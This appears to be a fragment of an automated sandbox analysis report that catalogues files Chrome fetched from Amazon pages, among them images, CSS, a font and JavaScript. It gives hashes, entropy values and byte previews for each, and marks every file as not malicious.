                                                                                                                                                                                                                                                                Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*........d.."...............................................................!..1."AQ.2aq..#B....Rbdrs.$3C......%St...........................................................!1.Q..#Aq.2..a."..............?....{.Z...<.*...^.t8.5.odT..._.l..X.f4"..|Y.<....../...O...k.}.=...~...o...MEJ..m.T.....*d...&V>...Yqn.,:xy..?.^.T4mn....lHX...c.....H>X..5[s..7.....DN.}.......).......k..,.q.t.e.-M#....O...I.W.CL.T.Y"R]..]...*.=.q..jc%%4..Y.........``......V....../h..U~....q....z8.?w..u<AKB.GX..-..`.....u.V.p....Te.o,......H.....,.4|.(w.h...ui1.~(A8.".h.jcNt...O..M|..`..n..>.[K.#.LP.nWk.......g...*.P..U.M....?j.y....I..\L|......l[...?S..|....T...P..6..t......lJh....#..rcqc...yg........A..L.h.lf0....oO.h......YUKF..fH.j.w.} .Z.tPX..|.Wfyp.)f.....q....|p+.T...].E.c.....-....w.v..'MGSS3.k.<0..t=$.....,F..`.5.-.2.(...3.Q
                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 266x200, components 3
                                                                                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                                                                                Size (bytes):15099
                                                                                                                                                                                                                                                                Entropy (8bit):7.957016527106763
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:384:KSnkwmVXbxj3+KVRiX6kUKgnJbtrmrdZXLYw:BktVU6HCrvXLYw
                                                                                                                                                                                                                                                                MD5:117265DB48EF2796C7887BA184FF0AC7
                                                                                                                                                                                                                                                                SHA1:0C0B8219AC7C23D1DA6E62F924B9A76F1F49949A
                                                                                                                                                                                                                                                                SHA-256:D765E4FE49DB4759861B6FEF195A0AE76421C4AA4F4976EB0E54E746DE079621
                                                                                                                                                                                                                                                                SHA-512:90C416860A6AAD1B0AAB6086302A2D6DD54463FC52FC4F0AC947F1FBE4F3ABB3E4461312C25ABE37B7679ED50B03559EF3E6D5536DF4E06EE77EE168D8EDD822
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                URL:https://m.media-amazon.com/images/I/71NAHqFhGML._AC_SY200_.jpg
                                                                                                                                                                                                                                                                Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*..........."..........5.................................................................m.......M..F.f.X5.'`.....(.-...N.n6!....yI..Ci.z,..^.............Jm..,x..;.f4g.Tw0.<.}:b...(<c..SSS....#..q.t.....9..$s...s....`s..oF......&.P.q-ON^.>..+...b...........E...i..?X9......uq&..F.iJ.....$(.!,j.......l`\y.....J:Rq.SX.u.p.....r...Wz..n,T...S..GyN...d..e(..&.uV..k.......Y2.1..Q......"e..^[5u.t....Uz.K.M4.;p.F.i-.....m...R\.......[FO...J..[....rW.g..kuMr.U.X.4._.O.........8}ekH.....7.....]..,.6s`...N..&\tMO.r*..Q<d.4...NZ[..@c...e]....5..r.q..fUf.....}I.a.u...$..=.=...#l....[].p..T..._[H<......k.;a#%......0Z.E........hX.<.d........G$^...p....}...K.qs.r....0.q..c.....*.!.....e&....^......w.^W.`..c/...i..........Jt..R>.jT.G..,!..ob.........lic.`.QN.J..i..vu.\6eN.r.\R-...[~j...oW..\V..qw..%...+
                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 142x116, components 3
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):2888
                                                                                                                                                                                                                                                                Entropy (8bit):7.842978756460343
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:48:TT0roWxrlPJGl01IjIxdjgtD3vJJJf2JV9kxAzrt61BOdKSzZprdTtxYYrf:Tfyol01QOjadz4vkwrg1GKSnrSYrf
                                                                                                                                                                                                                                                                MD5:A54909D52FBD57BA68A0DF43AC219D29
                                                                                                                                                                                                                                                                SHA1:8D9EB27FD7B9D1FE02DB7EC842191372AC58FDE5
                                                                                                                                                                                                                                                                SHA-256:4516BA3CAC16BA45C50EF87FBFA5F95363A43B370D01F024E16229E16572E6FF
                                                                                                                                                                                                                                                                SHA-512:0967BB8343DF565E2D7622A6F2B073BC5B7D2CC988014C5E0945F751359895EC0AC7EAA3B9EE921456A3F51C8A39282A862FCCC3B13E6578E919FD03AB826AD2
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*......t...."..............................................................!...1A.Q"2aq.#B..Sb..3..$CRr...................................................1A.!a.............?....(.)J.JR.R..8..8rG...\K..7,H...........a....H..a.|(...Qz...)..3....+{/..1..cN.."..a.....]>...f.w.....C.G.j.p?..qJ<,......s.."n..TgX..d....D...H..)@)JP.R......+....Df......!.7.7.....b.{/..."]...G5k..?*.cNn\.I..9.?...c.....;Q..u+.....F.fy#.......\?$........O.v5$..t2.G....1..'.+jp........bR..~w..@......}.7DcX.V..h..lo...56i.. ....f...Hc.....N{.U.-.JI.Ii-.Am....F.j...}d..{u3.!.Y@!...k]K.PDN.@..?Pm.6J. ..Q.....'=&.I..y.....k....g.[...._*.O..r.W..z..hx_..K;.[i#r....X....f5..)@)JP.R......0PY....v...5\8...0..y...HN2.....B.....}.|...T..U.Z..G.`.3`.?v......j..H.K..?.'o.a..5..n...Y....U......M;..O/MrWf.;.$....q.^...]<,.)...P./(=.$...5........;.
                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                File Type:JPEG image data, Exif standard: [TIFF image data, little-endian, direntries=0], progressive, precision 8, 1500x600, components 3
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):92658
                                                                                                                                                                                                                                                                Entropy (8bit):7.948149613967599
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:1536:fnAvuuA3l5o0u3Zp0wTMmcAyjL5s8POxnyx+3N7i3/kdmV/sq2apnNfweqZz6wr7:fkRMW0+klmEjL5fP4yxCNA/Ywsq2dZmG
                                                                                                                                                                                                                                                                MD5:744586DF892472843C31E081882DDB1B
                                                                                                                                                                                                                                                                SHA1:4A5E84553974BD7A43A63F99509FEE1EEF59DA20
                                                                                                                                                                                                                                                                SHA-256:18E50E9F054AB004A35C6FA0EA46C440D0DF1C6A1C3152262D3CF43B814DBFA5
                                                                                                                                                                                                                                                                SHA-512:E0FC2159EADA064F4E79326DD574B791BDE588CDC04AD02849F962C73D737A9C532CA933235197B238140604E9BFE4EC70C6EA349B5603DA0F29F11848F9F2C0
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:......Exif..II*.................Ducky.......7.....2http://ns.adobe.com/xap/1.0/.<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 9.1-c002 79.a6a63968a, 2024/03/06-11:52:05 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmp:CreatorTool="Adobe Photoshop 25.11 (Macintosh)" xmpMM:InstanceID="xmp.iid:448DAF084B5811EF8C44DC556605C1E6" xmpMM:DocumentID="xmp.did:448DAF094B5811EF8C44DC556605C1E6"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:2C8E13E74B5811EF8C44DC556605C1E6" stRef:documentID="xmp.did:2C8E13E84B5811EF8C44DC556605C1E6"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>...!Adobe.d..............i:......i............................................................##########................#############
                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                File Type:JPEG image data, progressive, precision 8, 3000x1200, components 3
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):144274
                                                                                                                                                                                                                                                                Entropy (8bit):7.735030497100166
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:3072:4HuLo+k6ONuRKXRMVvo95/L7yaZJWdKb/ivUJF6Pw41DNp6FCoC:EuLo+k6VqavU5T7y4n/NjcwY6Fe
                                                                                                                                                                                                                                                                MD5:82A69B829D3E935D11D849075F6C39A9
                                                                                                                                                                                                                                                                SHA1:FCBDE75E4547C6A72B7EFDEFF104314CA2149259
                                                                                                                                                                                                                                                                SHA-256:7EE6B7453552B8CBB749E172224344DF1FF248EAA7146C8AC99B89AF624BA62D
                                                                                                                                                                                                                                                                SHA-512:9270B5CB3FE40154458A965EB37F5EBAFC96E200F1D7FFF1BF6067DC29D191844A2105E0B0758946C67A176B23A339839B0B7FFE150BBA8023EAF546B9D4D6B7
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:.....XICC_PROFILE......HLino....mntrRGB XYZ .........1..acspMSFT....IEC sRGB.......................-HP ................................................cprt...P...3desc.......lwtpt........bkpt........rXYZ........gXYZ...,....bXYZ...@....dmnd...T...pdmdd........vued...L....view.......$lumi........meas.......$tech...0....rTRC...<....gTRC...<....bTRC...<....text....Copyright (c) 1998 Hewlett-Packard Company..desc........sRGB IEC61966-2.1............sRGB IEC61966-2.1..................................................XYZ .......Q........XYZ ................XYZ ......o...8.....XYZ ......b.........XYZ ......$.........desc........IEC http://www.iec.ch............IEC http://www.iec.ch..............................................desc........IEC 61966-2.1 Default RGB colour space - sRGB............IEC 61966-2.1 Default RGB colour space - sRGB......................desc.......,Reference Viewing Condition in IEC61966-2.1...........,Reference Viewing Condition in IEC61966-2.1..........................
                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                File Type:ASCII text, with very long lines (18121), with no line terminators
                                                                                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                                                                                Size (bytes):18121
                                                                                                                                                                                                                                                                Entropy (8bit):5.2667350205862
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:192:Qohgc8TpIDc8Vjm/x9UjL8s2IE/7Al2muXSjxxo7r74QMAV83OKHeC3WtfagdFZM:5Gdn/UuXSjo7rsQ8eCx4x+
                                                                                                                                                                                                                                                                MD5:5EA6CF08DBDCE6C1620779C1E86B0A73
                                                                                                                                                                                                                                                                SHA1:B06AF5A2E3F391670409C94E9F76EEDEF084A3C0
                                                                                                                                                                                                                                                                SHA-256:CE15CD0773F77B66CC95DE5C483D3E3F72C0CBC00854621C1FCBB0FC5A31A98D
                                                                                                                                                                                                                                                                SHA-512:83E67E3B5907FD81DAE9E93F9C33EE3DE3D131EB569B7C1DB4BB70510F69F2EAB42800DCD6CEDE866EAB733C8DA3289319351B16D28608FA16730F817DE38710
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                URL:https://images-eu.ssl-images-amazon.com/images/I/41945FR1dZL.css?AUIClients/AmazonGatewayAuiAssets&IaVMOKWd
                                                                                                                                                                                                                                                                Preview:@charset "UTF-8";.gw-spinner{background:url(https://m.media-amazon.com/images/S/sash/ZUrWp0pf42vcaeo.gif) 50% 50% no-repeat;display:inline-block;vertical-align:top;width:70px;height:70px}.gw-loading-stripe{background:url(https://m.media-amazon.com/images/S/sash/sHjosC8mtVdCbEZ.gif) no-repeat;display:inline-block;vertical-align:top;width:900px;height:3px}.gw-icon{background-size:132px 235px}#pageContent{background:#E3E6E6;margin:0 auto;max-width:none;min-width:1000px;overflow:hidden}#gw-content-grid hr{height:20px;border:none;margin:0}#gw-layout{padding:0 10px 0}#gw-card-layout{max-width:1480px;margin:0 auto;overflow:hidden;padding:20px 0}#gw-card-layout>.gw-col{max-width:400px}#gw-card-layout>.gw-col[data-col-span-ws="2"]{max-width:none}#gw-card-layout>.gw-col[data-col-span-sm="2"]{max-width:none}#gw-card-layout hr{border:none;margin:0}.gw-card-layout[data-flow-dir="h"]>.gw-col{height:420px}#main-content{margin:0 10px}#gw-content-grid{max-width:1480px;margin:0 auto}#gw-content-grid hr:
                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                File Type:GIF image data, version 89a, 1 x 1
                                                                                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                                                                                Size (bytes):43
                                                                                                                                                                                                                                                                Entropy (8bit):2.9889835948335506
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:3:CUXPQD/lHpse:1Qvse
                                                                                                                                                                                                                                                                MD5:E68CC604CAB69BF03B8CD228D940F5EF
                                                                                                                                                                                                                                                                SHA1:15C0C62C4C7C917B5DD82A8E1E439211A44B9E98
                                                                                                                                                                                                                                                                SHA-256:A3A64AEA2E96EC58A163DDB8D4CF86CF236178ED2D225B8F44154BC1B010DDCE
                                                                                                                                                                                                                                                                SHA-512:E250128E5EBE1384113C834409BEFB9CD0728B68EF07AB3450CB0A11F64A8AE9B29C48695DB73D0E4BBA0FD976BDCC24BEEA0F326FAD1B4CA072BCCE6E24E3A5
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                URL:https://fls-eu.amazon.com/1/batch/1/OP/A2VIGQ35RCS4UG:262-5692979-3003613:PAGVV1BKBQP3X0S0NFTP$uedata=s:%2Fap%2Fuedata%3Fat%26v%3D0.295375.0%26id%3DPAGVV1BKBQP3X0S0NFTP%26ctb%3D1%26m%3D1%26sc%3DPAGVV1BKBQP3X0S0NFTP%26pc%3D51179%26at%3D51179%26t%3D1723469125197%26pty%3DAuthenticationPortal%26spty%3DSignInClaimCollect%26pti%3Dundefined%26tid%3DPAGVV1BKBQP3X0S0NFTP%26aftb%3D1%26ui%3D2%26lob%3D0:51179
                                                                                                                                                                                                                                                                Preview:GIF89a.............!.......,...........L..;
                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 379x304, components 3
                                                                                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                                                                                Size (bytes):6924
                                                                                                                                                                                                                                                                Entropy (8bit):7.813547861396539
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:192:wviM/p7s49//revoJPmSeILKtLbdnDE+CqR:wvA4Jivo4SeImxdDj
                                                                                                                                                                                                                                                                MD5:909343879704912F23D92B955CA2F3E1
                                                                                                                                                                                                                                                                SHA1:FCFA9764EEE3FFBE0AB13E238EE49BCB482E384E
                                                                                                                                                                                                                                                                SHA-256:3C6C008035CC69F01A65A399EFBDC898317C783D091E5A37E6B482C30B0A88C5
                                                                                                                                                                                                                                                                SHA-512:77CB48EEC0E658C993D593CE582E967176F18DEB2756CA052B333A82952C081D254C39C96E2F95417BB707D54AC9708A8EDC87EC4612CA426633939279936572
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                URL:https://images-eu.ssl-images-amazon.com/images/G/39/UAE-hq/2024/img/Apparel/XCM_CUTTLE_1717422_3765620_758x608_2X_en_AE._SY304_CB558443037_.jpg
                                                                                                                                                                                                                                                                Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*......0.{.."..........4....................................................................@..........................................WE...\z;#....~.qUS..g.m..o.h...............J1.C....+..??l.S9..o...#......~......`...........V..7..6..q..1..n..}..[...b..;.I/.H.....}.....du............\..<S...e..w...rQk|W..`bQ}..C........[.~..0.........4...&...}4.mZ.X.iQe..$.e.....t.k.Q...Q.=.|...........,._..>g.r.^_..>.Z)b.kU.R.A:.}....R)a........:..................x...?O..B.,..[$R.O..H..=4.J......|...;aZv...........-.?..~..)c.....g..Y-....f.e.h.$.hR..4."..L...s{..................p.U./f'..^.;...b.xf.C%...%X.....!.................|.........]....~..I....x.X.K.u"....%.....s.=.GJ...../.E..}..P.;.u.........1e.i..>..If.I..6x%.z..R.f..-K...........<...3.;.Zv..........{....L.9.....e.....Uf.....b.-~..4..Z....H.[.l#8......:.......
                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 142x116, components 3
                                                                                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                                                                                Size (bytes):1494
                                                                                                                                                                                                                                                                Entropy (8bit):7.491314812588649
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:24:TRe+0CmRoR1v2Do6fMDKPmQnrKi3Sa7HpRA4VhPUB676vlZWlx/pg4qu7+cSr+Ok:TT0rogo6fM+1rKiiiJ64VxUJvWjpg4nX
                                                                                                                                                                                                                                                                MD5:5A672574F8EB20918FFBCAC3548DCB2E
                                                                                                                                                                                                                                                                SHA1:0CE81554FD0520BF8966D31E3C358F7D964CA1E2
                                                                                                                                                                                                                                                                SHA-256:7ABC64236E3A1539675B3E2E300FF8C360E50313D8995C7B4432B86B53F740E6
                                                                                                                                                                                                                                                                SHA-512:5A4F1F94E77CAF0FD0D1580ACBE32C1692A1AC210F155BEADA502861475A0A6AAD0F75C8B1861AE338878939BCD9948ECA18B5B56342A16A802AE6BFE8F34B9A
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                URL:https://images-eu.ssl-images-amazon.com/images/G/39/UAE-hq/2020/img/Apparel/XCM_CUTTLE_1230335_1213334_UAE_3151164_153x125_en_AE._SY116_CB428587698_.jpg
                                                                                                                                                                                                                                                                Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*......t...."..............................................................!.1Q."2Aaq.....3r...#R...4................................................12............?..........................h...Qo.....1.h....s.w.........^kp.URuv.qMC<.M.q..X&...1]).K=...i2h..9;o)i[.[..U.b.....:.TUR.y@H........I..j.P..h.......w.IJO..8..Q.....r.87.Q.....Y6v...Fz./.Q.(..O.....\....D.......JR.n=.I...}...=6.75..#..Cj..,p.,vF.6..\..N.....:6...F.4..tw*u{.}$.t.YB..B.*t...X...._.M.....\-g.UN-oY.I...-.q.cN.oVpm.\.E..8..Ao}..c$.?......<..B....,h.,7...NO9......#......kR.;wXk..b.. ..If<...%@......^[m.....l.2......z.9[..q...S.6..f...ire.-];..Q......k...5.e..vH..e..L..._. .....2...V.(.P.5;J+.Y......QeuuV.j7..5.=.T..*m..8.x....ye....V..1N...9....\...$O+.k.N.8....:^....(..W..p....f..d..#%.SD..i8.3!y*\O.......T....GJ...u.n...I..l
                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                File Type:ASCII text, with very long lines (65536), with no line terminators
                                                                                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                                                                                Size (bytes):76642
                                                                                                                                                                                                                                                                Entropy (8bit):4.91804869468611
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:1536:LyNsNwNAN/WSiHNXNW+NaNs5NmNcWNBNCINoNGtN0NYjN1Nqm:8k
                                                                                                                                                                                                                                                                MD5:8982FAB302BFD0574496A6C5EC6EAF0F
                                                                                                                                                                                                                                                                SHA1:86B1E78927CC030C7688AF418B5A895A8F73D2CD
                                                                                                                                                                                                                                                                SHA-256:7CD66B055116D24C67CFA9B0C2BF97ADAD9F0CD3985D8411A3702692DA7B2576
                                                                                                                                                                                                                                                                SHA-512:E1491B341E331F6E97690474C81F618D8FE0E4C3A8DEC18619AC94AA3B05330ACBAF2380F14651ACC9FE2E5F5782A4F257945BD7F7F11CE7DE858EB48FEE7577
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                URL:https://images-eu.ssl-images-amazon.com/images/I/61wm2WQpqYL.css?AUIClients/ACSWidgetAssets-contentGrid
                                                                                                                                                                                                                                                                Preview:.bxc-grid__container{margin-left:auto;margin-right:auto}.bxc-grid__container.bxc-grid__container--width-770{max-width:770px}.bxc-grid__container.bxc-grid__container--width-771{max-width:771px}.bxc-grid__container.bxc-grid__container--width-768{max-width:768px}.bxc-grid__container.bxc-grid__container--width-960{max-width:960px}.bxc-grid__container.bxc-grid__container--width-1024{max-width:1024px}.bxc-grid__container.bxc-grid__container--width-1170{max-width:1170px}.bxc-grid__container.bxc-grid__container--width-1280{max-width:1280px}.bxc-grid__container.bxc-grid__container--width-1366{max-width:1366px}.bxc-grid__container.bxc-grid__container--width-1500{max-width:1500px}.bxc-grid__container.bxc-grid__container--width-full{max-width:100%}.bxc-grid__l-gutter-layout .bxc-grid__row{margin-left:-24px}.bxc-grid__l-gutter-layout .bxc-grid__column{position:relative;box-sizing:border-box;display:inline-block;margin-right:-.3em;vertical-align:top;min-height:1px;padding-left:24px}.bxc-grid__l-gutt
                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                File Type:Web Open Font Format (Version 2), TrueType, length 16460, version 1.655
                                                                                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                                                                                Size (bytes):16460
                                                                                                                                                                                                                                                                Entropy (8bit):7.987708256804987
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:192:pvO6xEw4Jj9HYfGbtieHqP0l4S7NVXfU3xqJvzJmPnC1LiTNNIb0QAZtcnlclz0n:bWzHqP7S7Na3SJmKNyElcUuMXqGN3v
                                                                                                                                                                                                                                                                MD5:15E17F26C664EE0518F82972282E6FF3
                                                                                                                                                                                                                                                                SHA1:46B91BDA68161C14E554A779643EF4957431987B
                                                                                                                                                                                                                                                                SHA-256:4065B43BA3DB8DA5390BA0708555889F78E86483FE0226EF79EA22D07C306B89
                                                                                                                                                                                                                                                                SHA-512:54EADB53589C5386A724C8EEA2603481EBB23E7062FD7BFAB0EAFE55C9E1344F96320259412FB0DC7A6F5B6E09B32F6907F9AAA66BCA5812D45157E3771C902F
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                URL:https://m.media-amazon.com/images/S/sash/KFPk-9IF4FqAqY-.woff2
                                                                                                                                                                                                                                                                Preview:wOF2......@L..........?.........................?FFTM..8..j..@.`..~.....h..i.6.$..F..<.. .....a?webf..}...6..........n.......fE.q. ..Y...9.2d.$.}[..0.H....j.k....U..#"-SM.t..."D....+....t.8f...s...g636|..g._.....EB.T.!.B..!..y...k....Ya..G~.Y.;+....)...k...=it.........k_.^.z.#.).).....Y?....}..&N.s....1..=A.FXSG...`C...00..5*l..#6...w....-...hkJ. .-...$D..1j..F.]..ny^..]..:.\...2......^n...5P......_.6..k..2..K..i......y....K...?..6...*q>.. .....a9...........4/.c.E.........q...8N..$.$....z.?.d..v.QmY..D....s...:Y...S.|..|...[..@...4...V..n..s....t....A....\.v..X...M..O4.!=$..35m1\..wT"..w.c.s(...]t.?....."Q....1(.p..%0<-v..b.^R.)E:$..0<.....R.B.TY...K..n\..{#...kd.-.8..#.........t;..3.....IT[..2.L...........H..$..._.j.....b<B..uN.,*....k....@.k.k.....[.........6....U.1bDDD..Qu....R..+a......^.iS..qb.^..U.uU.sj..-<D....H..Y.J..[......8....V}........}.$^...CE..jc. d`.^..q..Nw.....`...1...S19.u....`H..WT.1.....y...c.A..op`..V..I....
                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 400x400, components 3
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):39385
                                                                                                                                                                                                                                                                Entropy (8bit):7.948506994397826
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:768:8gLMZaPZ2SRcZakX05s/uZI4UzMjuqu2LN1EY0BX93cBdmfjuV:PZjrkX0+/uVfu2XqBX9sHmf0
                                                                                                                                                                                                                                                                MD5:C7F67E9EE30FC682775AF02FC3FE1967
                                                                                                                                                                                                                                                                SHA1:C70BDB7CB310C46B0EE8C7E66BA79633BF34D3A4
                                                                                                                                                                                                                                                                SHA-256:FB362B603C9FF81C9E9C43D107E55E7DA11CF9F0EFA04BE9C804AFD1AD6B428A
                                                                                                                                                                                                                                                                SHA-512:02D38553B7FB3EEAAA5C36133A9336C1339337C8BD728D64340F0A3B3D6886E7A91D618D66DA10FB79F8AC4BCB692E375363DB0B71BEF2DE518BD037BD258C8C
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:......JFIF......................................................................................................................................................................:................................................................................`.-0....Yo.......u....u..._.c...f.U?p...?................=..-...Cc...xF@.......?\.f..IC.k...Z..@............j....hc.|N................s..I.=P........i......f."Hy|6..........fV+......@........Z..&..6ee .;..........U.....h..v.2.........M.a.lJ.............v.....O...M.@......C.r...T...P......t....T......;.x...~.y..8].. ......y..%.6.........f^....<.fMj...|7Mtn...].....p`..|..vSr?........-...9.r8.......1..C...7?............v....7U.NN...NK.;.@.x..9^......[.Y.V..\...P......}=...._.F..:.n..R.3.i.s........'..W..D.>.R..4...).......ddy.7..Wp......Q.7..~..'..)..(..3.i.y.nQ.7.T.>[5>A.....&..B.}..0..k..3...4.Ng ......?..7..~k..l.9..p.MG..e..^M..)..-.. ....S...&>..m.n0......y.'................A.6N...S......).....
                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                File Type:GIF image data, version 89a, 1 x 1
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):43
                                                                                                                                                                                                                                                                Entropy (8bit):2.9889835948335506
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:3:CUXPQD/lHpse:1Qvse
                                                                                                                                                                                                                                                                MD5:E68CC604CAB69BF03B8CD228D940F5EF
                                                                                                                                                                                                                                                                SHA1:15C0C62C4C7C917B5DD82A8E1E439211A44B9E98
                                                                                                                                                                                                                                                                SHA-256:A3A64AEA2E96EC58A163DDB8D4CF86CF236178ED2D225B8F44154BC1B010DDCE
                                                                                                                                                                                                                                                                SHA-512:E250128E5EBE1384113C834409BEFB9CD0728B68EF07AB3450CB0A11F64A8AE9B29C48695DB73D0E4BBA0FD976BDCC24BEEA0F326FAD1B4CA072BCCE6E24E3A5
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:GIF89a.............!.......,...........L..;
                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                File Type:ASCII text, with very long lines (548)
                                                                                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                                                                                Size (bytes):15219
                                                                                                                                                                                                                                                                Entropy (8bit):5.408378924173576
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:384:LA+1NXTmdAVVxLxwEsgiGrdjLKYVu10V4:cGQg9dri
                                                                                                                                                                                                                                                                MD5:10A0F40E0F5C16A5157FF98B7335A887
                                                                                                                                                                                                                                                                SHA1:88627C59520E02536E13761347C845365085186B
                                                                                                                                                                                                                                                                SHA-256:4AFD614399E1B0CDB38015CFDFCC778764F61E8B6B1BB5C73D67829BAB1457C5
                                                                                                                                                                                                                                                                SHA-512:4C472B6BE18186AA86A7798B7A543DFA0494BA51267203A7CC77B490E00EF0BA8F25176B8EB7BADBB3F5329509D2F3E4124ACF542E60110204B5E38F23C49106
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                URL:https://m.media-amazon.com/images/I/31ULjw05G7L.js?AUIClients/AmazonLightsaberPageAssets
                                                                                                                                                                                                                                                                Preview:(function(n){var p=window.AmazonUIPageJS||window.P,m=p._namespace||p.attributeErrors,l=m?m("AmazonLightsaberPageAssets",""):p;l.guardFatal?l.guardFatal(n)(l,window):l.execute(function(){n(l,window)})})(function(n,p,m){(function(){var l;(function(c){c.deep=function(a){return JSON.parse(JSON.stringify(a))}})(l||(l={}));var x;(function(c){c.log=function(a){for(var b=1;b<arguments.length;b++);}})(x||(x={}));var q;(function(c){c.isObject=function(a){return!!a&&"object"===typeof a&&!Array.isArray(a)};c.isNonEmptyString=.function(a){return"string"===typeof a&&0<a.length};c.isPositiveInteger=function(a){return"number"===typeof a&&Math.floor(a)===a&&0<=a&&Infinity!==a};c.isFunction=function(a){return"function"===typeof a}})(q||(q={}));var B=this&&this.__awaiter||function(c,a,b,f){function d(a){return a instanceof b?a:new b(function(b){b(a)})}return new (b||(b=Promise))(function(b,g){function e(a){try{r(f.next(a))}catch(t){g(t)}}function h(a){try{r(f["throw"](a))}catch(t){g(t)}}function r(a){a.d
                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
